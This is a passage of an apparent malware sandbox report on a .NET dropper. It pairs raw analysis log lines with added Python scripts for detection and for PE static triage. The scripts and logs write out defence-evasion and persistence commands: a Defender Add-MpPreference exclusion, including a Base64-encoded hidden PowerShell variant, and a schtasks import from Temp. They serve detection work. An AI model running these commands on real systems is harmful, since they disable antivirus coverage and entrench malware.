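# variant are assumptions of this example.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\P020241901.exe"
ENCODED = base64.b64encode(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe"'
    .encode("utf-16le")).decode()

EVENTS = [
    {"pid": 100, "ppid": 1, "image": DROPPER, "cmd": f'"{DROPPER}"'},
    {"pid": 101, "ppid": 100, "image": PS,
     "cmd": f'"{PS}" Add-MpPreference -ExclusionPath "{DROPPER}"'},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" '
            r'/XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp"'},
    {"pid": 103, "ppid": 100, "image": PS, "cmd": f'"{PS}" -NoP -W Hidden -enc {ENCODED}'},
    {"pid": 104, "ppid": 1, "image": r"C:\Windows\System32\schtasks.exe",  # benign control
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_PREFIXES = "|".join(re.escape("encodedcommand"[:i]) for i in range(14, 0, -1))
ENC_RE = re.compile(rf"(?:^|\s)-(?:{ENC_PREFIXES})\s+([A-Za-z0-9+/=]+)", re.I)
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)", re.I | re.S)
TASK_XML_RE = re.compile(r'/Create\b.*?/XML\s+"?([^"\s]+)', re.I)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TE?MP%", re.I)


def decode_encoded_command(cmd: str) -> str:
    """Append the UTF-16LE payload of an -EncodedCommand argument so the other
    rules see the real cmdlet; return cmd unchanged if there is none or it is invalid."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return cmd


def detect(events: list) -> list:
    """Run both rules over process-creation events. Each hit records the parent
    image, which is the pivot an analyst wants: here a user-profile executable
    is the parent of every defence-evasion and persistence action."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        cmd = decode_encoded_command(e["cmd"])
        parent = by_pid.get(e["ppid"], {}).get("image", "<unknown>")
        if EXCLUSION_RE.search(cmd):
            hits.append({"rule": "defender_exclusion_added", "pid": e["pid"],
                         "parent": parent, "encoded": cmd != e["cmd"]})
        task = TASK_XML_RE.search(cmd)
        if task and TEMP_DIR_RE.search(task.group(1)):
            hits.append({"rule": "schtask_xml_from_temp", "pid": e["pid"],
                         "parent": parent, "xml": task.group(1)})
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

Run as a script it prints three hits (two exclusion adds, one of them decoded from Base64, and one task import from Temp); the schtasks import from C:\ProgramData is a control and produces none. Matching on the decoded command line rather than only on the raw one is what keeps the Base64 variant from slipping past a plain string rule.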

                      Data Obfuscation

Source: P020241901.exe, frmGetData.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: VKkzqGUhsZwwm.exe.0.dr, frmGetData.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.P020241901.exe.4e90000.13.raw.unpack, Uni.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | .Net Code: xHRHxx28gr System.Reflection.Assembly.Load(byte[])
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | .Net Code: xHRHxx28gr System.Reflection.Assembly.Load(byte[])
Source: 0.2.P020241901.exe.25a3510.0.raw.unpack, Uni.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: P020241901.exe | Static PE information: 0x9A0837A8 [Wed Nov 22 01:36:40 2051 UTC]
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06EDABA6 push dword ptr [edx+ebp*2-75h]; iretd 0_2_06EDABAF
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CCBCD2 push es; retf 9_2_05CCBCE2
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CCC451 push cs; retf 9_2_05CCC452
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B89985 push FFFFFF8Bh; iretd 10_2_06B89987
Source: P020241901.exe | Static PE information: section name: .text entropy: 7.992542733514758
Source: VKkzqGUhsZwwm.exe.0.dr | Static PE information: section name: .text entropy: 7.992542733514758
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, QXEfCQbO4ejMkoi2pkL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x6fktjWuqX', 'sVMkdSc0Qg', 'tCKkGh5fAb', 'NrGk1kv11V', 'FIIkbncMZt', 'fK1k8HeUlv', 'kg7krYiAfE'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, L6xr2KDkKl0X9RNbit.cs | High entropy of concatenated method names: 'vdaWjJBIGN', 'M0HWmXNaoQ', 'kYOWZBFKFd', 'WDeWP3AY87', 'QCEWAaTxAB', 'SmqWgnEH4Q', 'LNo0iORSgJ2QLHLO4B', 'VHxEspssYrjArm4Lj1', 'GvxWWWyCpp', 'tbJW6U8ETH'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, qfrOihsrVIqemUYdKb.cs | High entropy of concatenated method names: 'ToString', 'H8Og50Nunx', 's6rgKYiiYH', 'bH7gNSQ1dU', 'RUCgqOC56e', 'SrRg4Dwst5', 'rGjg049eAu', 'x9sglwBZJX', 'x6HgXiRS1k', 'zntg94e2cp'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, iGTtMKSJFrUfVV0vaA.cs | High entropy of concatenated method names: 'GPpVZpaJFI', 'AvXVP4LsJd', 'ToString', 'EdFVakxFDX', 'GVuVRXL6ay', 'uTlVM4jCDR', 'J9MVvicmQg', 'sgwV74PK0m', 'svkVjpA3Jb', 'FGiVmj9nSb'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, bPNNRdxo201VexQ9ab.cs | High entropy of concatenated method names: 'pKkyw4TH5K', 'BsqyKkklTS', 'huryNi9qIE', 'Q12yqyBcdE', 'gtVyt2017o', 'R6Uy4OnCTA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, cadg7Rdhg8q8Fy4m9y.cs | High entropy of concatenated method names: 'GOZSUxuYfY', 'UClSBFXhZU', 'TKjSw2DAMv', 'G16SK9yXoM', 'qSpSqZ2Zq4', 'BRIS430fnL', 'jRTSl8lr6e', 'n4cSX3Ya3s', 'x0DSOF1VUn', 'zG5S5i5xt8'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, je9TcX0xAKQDM7LNZD.cs | High entropy of concatenated method names: 'M6xvowGRiB', 'fB3vevlLeC', 'uUVMNRonH5', 'FDDMq6YWC9', 'uL8M4t7XH6', 'suDM08xRur', 'z8gMl4xv4L', 'gvcMXivfpa', 'm8OM9lPrjy', 'CI1MO7vaqF'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | High entropy of concatenated method names: 'kMr6srje9M', 'O386aNTZAq', 'kxe6RMR219', 'oEb6MMKdoK', 'ntR6vY8aTd', 'vPP67HcbJM', 'Dk16jDNrKX', 'Onq6mnFVnW', 'Aht6hnlUXT', 'sSb6ZhkjTK'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Mon41UfUXZQosr60DT.cs | High entropy of concatenated method names: 'DnmRtekQlP', 'vnrRdwBpSl', 't3BRG098iJ', 'lKMR1yvS6S', 'tGARbfmlaI', 'NT5R8tTlFI', 'SBmRrk8y9w', 'VjTRJGomwO', 'P8uRDwOV4a', 'u4HRcY2SZ9'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, tQZKKOEqWWpeP4Vpaf.cs | High entropy of concatenated method names: 'bYwyaAFNfN', 'gXbyRZmhQH', 'c4UyMbflvQ', 'BVZyvZIOQe', 'HrJy7w2xll', 'ljTyjovIYh', 'fLkymufj1M', 'Neqyh6cccP', 'QCMyZaiFZC', 'hBDyP52ovJ'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, go06C9moK82tIqZfYy.cs | High entropy of concatenated method names: 'zK3xN6txm', 'n1dTWSSuR', 'HAau0aoeQ', 'I6fesj9jT', 'XAqBHjxrZ', 'tPAFKG0jh', 'EZ9jFTgT7Xd7g5KoQw', 'l4wclXTS3cjFpnhayv', 'D68yEMTKl', 'I7fkTeePG'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, G3IEi4ompnZTtFNQRs.cs | High entropy of concatenated method names: 'cjDVJFOxu1', 'hfNVcChc1U', 'APdyQIZUbh', 'D5FyWRHW6v', 'FnBV52OX52', 'eDqVf7TYbO', 'lvDVEVdvso', 'CGFVtI8KYU', 'xgAVdlxwVw', 'KWsVGkY5cK'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Iy6OlWlTI2sYZDWQ9K.cs | High entropy of concatenated method names: 'fSGnWspfQG', 'EE9n6cu1dJ', 'EY5nHRgaHs', 'SsNnaO9cRK', 'OPAnR2V72F', 'fkXnvbVm7F', 'Ii1n7bANUc', 'kQIyrDUyRg', 'Q3fyJANjh5', 'JMdyDXW5TB'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, FXeZkIvxW4V3GyxGyW.cs | High entropy of concatenated method names: 'qCd7sFdZME', 'tbu7RsX5NB', 'wlD7vupM3G', 'F927jinM7M', 'OAg7m39fn3', 'aJOvbJPr5g', 'La2v8JCHHW', 'HcnvrTuRmv', 'ePQvJJLLg1', 'ClavD2HuJZ'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, wgEvRkgLjLLSsfE0cN.cs | High entropy of concatenated method names: 'P4kMTkW5f5', 'p56MuLVlwX', 'mJGMUxbKTN', 'w3ZMBlRHgm', 'cj8MAErJgr', 's82MgGSyVM', 'kq9MVnFGpb', 'dRBMyMpiOq', 'zuxMnThgpY', 'Q1oMkQsHxb'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, LS7BVe6fJxxEsYdQMj.cs | High entropy of concatenated method names: 'Dispose', 'aByWDSHOS6', 'xaoCKK0MkA', 'Gxw22VDmM1', 'WuhWcsbufo', 'hCOWzXDynr', 'ProcessDialogKey', 'XOjCQu3nFD', 'rQsCWHnAl6', 'JSeCCMGxdv'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, VWxAWNb5I4Q1gTqGVMC.cs | High entropy of concatenated method names: 'VvonIyDaPH', 'ibenYfsUhR', 'gu6nxA54IR', 'yCInTtBdfM', 'fZunokEmxZ', 'UZ4nuVNIGS', 'HUCnecoW8Q', 'bvgnUSe9fD', 'S5LnBv8fKI', 'hF6nFpqSyH'
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, uW1uhjX5Oiqh7yN2Hx.cs | High entropy of concatenated method names: 'gEPjICbLS7', 'eRVjYMGovT', 'OyVjxynUGH', 'ge0jT6vcoU', 'HKajomD2tt', 'a5NjusyGt5', 'aS3jeSkJnw', 'TY6jUo8IWQ', 'FNwjBAN1s0', 'eUvjFjVU1A'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, QXEfCQbO4ejMkoi2pkL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x6fktjWuqX', 'sVMkdSc0Qg', 'tCKkGh5fAb', 'NrGk1kv11V', 'FIIkbncMZt', 'fK1k8HeUlv', 'kg7krYiAfE'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, L6xr2KDkKl0X9RNbit.cs | High entropy of concatenated method names: 'vdaWjJBIGN', 'M0HWmXNaoQ', 'kYOWZBFKFd', 'WDeWP3AY87', 'QCEWAaTxAB', 'SmqWgnEH4Q', 'LNo0iORSgJ2QLHLO4B', 'VHxEspssYrjArm4Lj1', 'GvxWWWyCpp', 'tbJW6U8ETH'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, qfrOihsrVIqemUYdKb.cs | High entropy of concatenated method names: 'ToString', 'H8Og50Nunx', 's6rgKYiiYH', 'bH7gNSQ1dU', 'RUCgqOC56e', 'SrRg4Dwst5', 'rGjg049eAu', 'x9sglwBZJX', 'x6HgXiRS1k', 'zntg94e2cp'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, iGTtMKSJFrUfVV0vaA.cs | High entropy of concatenated method names: 'GPpVZpaJFI', 'AvXVP4LsJd', 'ToString', 'EdFVakxFDX', 'GVuVRXL6ay', 'uTlVM4jCDR', 'J9MVvicmQg', 'sgwV74PK0m', 'svkVjpA3Jb', 'FGiVmj9nSb'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, bPNNRdxo201VexQ9ab.cs | High entropy of concatenated method names: 'pKkyw4TH5K', 'BsqyKkklTS', 'huryNi9qIE', 'Q12yqyBcdE', 'gtVyt2017o', 'R6Uy4OnCTA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, cadg7Rdhg8q8Fy4m9y.cs | High entropy of concatenated method names: 'GOZSUxuYfY', 'UClSBFXhZU', 'TKjSw2DAMv', 'G16SK9yXoM', 'qSpSqZ2Zq4', 'BRIS430fnL', 'jRTSl8lr6e', 'n4cSX3Ya3s', 'x0DSOF1VUn', 'zG5S5i5xt8'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, je9TcX0xAKQDM7LNZD.cs | High entropy of concatenated method names: 'M6xvowGRiB', 'fB3vevlLeC', 'uUVMNRonH5', 'FDDMq6YWC9', 'uL8M4t7XH6', 'suDM08xRur', 'z8gMl4xv4L', 'gvcMXivfpa', 'm8OM9lPrjy', 'CI1MO7vaqF'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | High entropy of concatenated method names: 'kMr6srje9M', 'O386aNTZAq', 'kxe6RMR219', 'oEb6MMKdoK', 'ntR6vY8aTd', 'vPP67HcbJM', 'Dk16jDNrKX', 'Onq6mnFVnW', 'Aht6hnlUXT', 'sSb6ZhkjTK'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Mon41UfUXZQosr60DT.cs | High entropy of concatenated method names: 'DnmRtekQlP', 'vnrRdwBpSl', 't3BRG098iJ', 'lKMR1yvS6S', 'tGARbfmlaI', 'NT5R8tTlFI', 'SBmRrk8y9w', 'VjTRJGomwO', 'P8uRDwOV4a', 'u4HRcY2SZ9'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, tQZKKOEqWWpeP4Vpaf.cs | High entropy of concatenated method names: 'bYwyaAFNfN', 'gXbyRZmhQH', 'c4UyMbflvQ', 'BVZyvZIOQe', 'HrJy7w2xll', 'ljTyjovIYh', 'fLkymufj1M', 'Neqyh6cccP', 'QCMyZaiFZC', 'hBDyP52ovJ'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, go06C9moK82tIqZfYy.cs | High entropy of concatenated method names: 'zK3xN6txm', 'n1dTWSSuR', 'HAau0aoeQ', 'I6fesj9jT', 'XAqBHjxrZ', 'tPAFKG0jh', 'EZ9jFTgT7Xd7g5KoQw', 'l4wclXTS3cjFpnhayv', 'D68yEMTKl', 'I7fkTeePG'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, G3IEi4ompnZTtFNQRs.cs | High entropy of concatenated method names: 'cjDVJFOxu1', 'hfNVcChc1U', 'APdyQIZUbh', 'D5FyWRHW6v', 'FnBV52OX52', 'eDqVf7TYbO', 'lvDVEVdvso', 'CGFVtI8KYU', 'xgAVdlxwVw', 'KWsVGkY5cK'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Iy6OlWlTI2sYZDWQ9K.cs | High entropy of concatenated method names: 'fSGnWspfQG', 'EE9n6cu1dJ', 'EY5nHRgaHs', 'SsNnaO9cRK', 'OPAnR2V72F', 'fkXnvbVm7F', 'Ii1n7bANUc', 'kQIyrDUyRg', 'Q3fyJANjh5', 'JMdyDXW5TB'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, FXeZkIvxW4V3GyxGyW.cs | High entropy of concatenated method names: 'qCd7sFdZME', 'tbu7RsX5NB', 'wlD7vupM3G', 'F927jinM7M', 'OAg7m39fn3', 'aJOvbJPr5g', 'La2v8JCHHW', 'HcnvrTuRmv', 'ePQvJJLLg1', 'ClavD2HuJZ'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, wgEvRkgLjLLSsfE0cN.cs | High entropy of concatenated method names: 'P4kMTkW5f5', 'p56MuLVlwX', 'mJGMUxbKTN', 'w3ZMBlRHgm', 'cj8MAErJgr', 's82MgGSyVM', 'kq9MVnFGpb', 'dRBMyMpiOq', 'zuxMnThgpY', 'Q1oMkQsHxb'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, LS7BVe6fJxxEsYdQMj.cs | High entropy of concatenated method names: 'Dispose', 'aByWDSHOS6', 'xaoCKK0MkA', 'Gxw22VDmM1', 'WuhWcsbufo', 'hCOWzXDynr', 'ProcessDialogKey', 'XOjCQu3nFD', 'rQsCWHnAl6', 'JSeCCMGxdv'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, VWxAWNb5I4Q1gTqGVMC.cs | High entropy of concatenated method names: 'VvonIyDaPH', 'ibenYfsUhR', 'gu6nxA54IR', 'yCInTtBdfM', 'fZunokEmxZ', 'UZ4nuVNIGS', 'HUCnecoW8Q', 'bvgnUSe9fD', 'S5LnBv8fKI', 'hF6nFpqSyH'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, uW1uhjX5Oiqh7yN2Hx.cs | High entropy of concatenated method names: 'gEPjICbLS7', 'eRVjYMGovT', 'OyVjxynUGH', 'ge0jT6vcoU', 'HKajomD2tt', 'a5NjusyGt5', 'aS3jeSkJnw', 'TY6jUo8IWQ', 'FNwjBAN1s0', 'eUvjFjVU1A'
Source: C:\Users\user\Desktop\P020241901.exe | File created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
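Three of the static indicators in this section can be checked without a sandbox: the COFF time stamp 0x9A0837A8 resolves to November 2051 and is therefore forged, the .text section entropy of 7.99 sits just under the 8.0 ceiling of random data and points to packed or encrypted content, and the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR data directory marks a .NET assembly. The Python below is an added example, not Joe Sandbox code: it parses these fields straight out of a PE header and reports them in the same terms the report uses. The 7.5 entropy threshold is an assumption of the example, and the file it runs on is a minimal PE32 constructed inline (one executable .text section filled with a SHA-256 chain standing in for packed code, a CLR directory, and the sample's time stamp); pass the bytes of a real file to triage() to use it on a dropped binary.

```python
"""Static triage for the indicators flagged in this section: a COFF time stamp
in the future, a near-8.0-entropy executable section and a CLR header.
Added example, not Joe Sandbox code; the PE it runs on is constructed inline."""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Optional

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
PACKED_ENTROPY = 7.5  # assumption: compiled .text normally sits well below this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data: bytes) -> dict:
    """Read the COFF header, the CLR data directory and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    is_dotnet = False
    if opt_size:
        magic = struct.unpack_from("<H", data, opt)[0]
        dirs = opt + (96 if magic == 0x10B else 112)       # PE32 vs PE32+ directory table
        nrva = struct.unpack_from("<I", data, dirs - 4)[0]  # NumberOfRvaAndSizes
        if nrva > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
            rva, _ = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
            is_dotnet = rva != 0
    sections = []
    for i in range(nsections):
        name, _, _, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "characteristics": chars,
            "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size]),
        })
    return {"timestamp": timestamp, "is_dotnet": is_dotnet, "sections": sections}


def triage(data: bytes, now: Optional[datetime] = None) -> list:
    """Return the findings a sandbox would list for this file."""
    now = now or datetime.now(timezone.utc)
    info = parse_pe(data)
    built = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    findings = []
    if built > now:
        findings.append(f"suspicious time stamp: 0x{info['timestamp']:08X} "
                        f"[{built:%a %b %d %H:%M:%S %Y} UTC] lies in the future")
    if info["is_dotnet"]:
        findings.append("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present: managed (.NET) assembly")
    for s in info["sections"]:
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > PACKED_ENTROPY:
            findings.append(f"section {s['name']} entropy {s['entropy']:.3f}: "
                            "executable section looks packed or encrypted")
    return findings


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed code."""
    out, block = b"", b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample(timestamp: int, text: bytes) -> bytes:
    """Constructed minimal PE32 with a CLR directory and one .text section (test fixture)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2000, 0x48)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16) + bytes(dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, len(opt), 0x0102)
    raw_ptr = len(dos) + 4 + len(coff) + len(opt) + 40
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_ptr,
                      0, 0, 0, 0, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    return dos + b"PE\0\0" + coff + opt + sec + text


if __name__ == "__main__":
    for line in triage(build_sample(0x9A0837A8, pseudo_random(4096))):
        print(line)
```

Run as a script it prints the three findings for the constructed sample; the same three lines appear in this section for the real file. A future time stamp is a cheap but reliable tell because the .NET compiler writes the build time by default, so a 2051 value means someone rewrote the header after linking, and combining it with an executable section at near-maximum entropy is enough to route a file to unpacking before any dynamic analysis.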

                      Boot Survival

                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
